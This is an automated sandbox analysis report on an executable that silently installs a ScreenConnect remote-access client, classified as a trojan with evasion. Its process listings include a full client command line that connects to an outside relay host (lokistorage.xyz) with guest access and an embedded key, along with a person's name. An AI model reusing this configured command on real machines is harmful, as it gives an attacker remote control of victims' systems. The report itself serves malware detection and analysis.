                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: H36NgltNe7.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_052C0560 CreateProcessAsUserW,8_2_052C0560
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f5279.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{7A085B4C-0189-0C8C-1652-69D0030FEB14}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5509.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5529.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI576D.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f527b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f527b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{7A085B4C-0189-0C8C-1652-69D0030FEB14}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{7A085B4C-0189-0C8C-1652-69D0030FEB14}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{7A085B4C-0189-0C8C-1652-69D0030FEB14}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\k0xkl0r0.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\k0xkl0r0.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI5529.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014ED4888_2_014ED488
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB4ACF6D1D9_2_00007FFB4ACF6D1D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB4ACF5CB69_2_00007FFB4ACF5CB6
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A9F703D10_2_00007FFB4A9F703D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD0DC7610_2_00007FFB4AD0DC76
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD0296C10_2_00007FFB4AD0296C
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD0596610_2_00007FFB4AD05966
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD0EA2210_2_00007FFB4AD0EA22
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD05BA410_2_00007FFB4AD05BA4
                              Source: H36NgltNe7.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: H36NgltNe7.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: H36NgltNe7.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: H36NgltNe7.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: H36NgltNe7.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1486309822.0000000002860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1504107631.00000000076F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1504107631.0000000007617000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1504107631.0000000007617000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1492545938.0000000005050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000002.1492360270.0000000004F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe
                              Source: H36NgltNe7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.H36NgltNe7.exe.6763d4.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal50.troj.evad.winEXE@17/65@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H36NgltNe7.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: H36NgltNe7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: H36NgltNe7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: H36NgltNe7.exeReversingLabs: Detection: 21%
                              Source: H36NgltNe7.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: H36NgltNe7.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeFile read: C:\Users\user\Desktop\H36NgltNe7.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\H36NgltNe7.exe "C:\Users\user\Desktop\H36NgltNe7.exe"
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
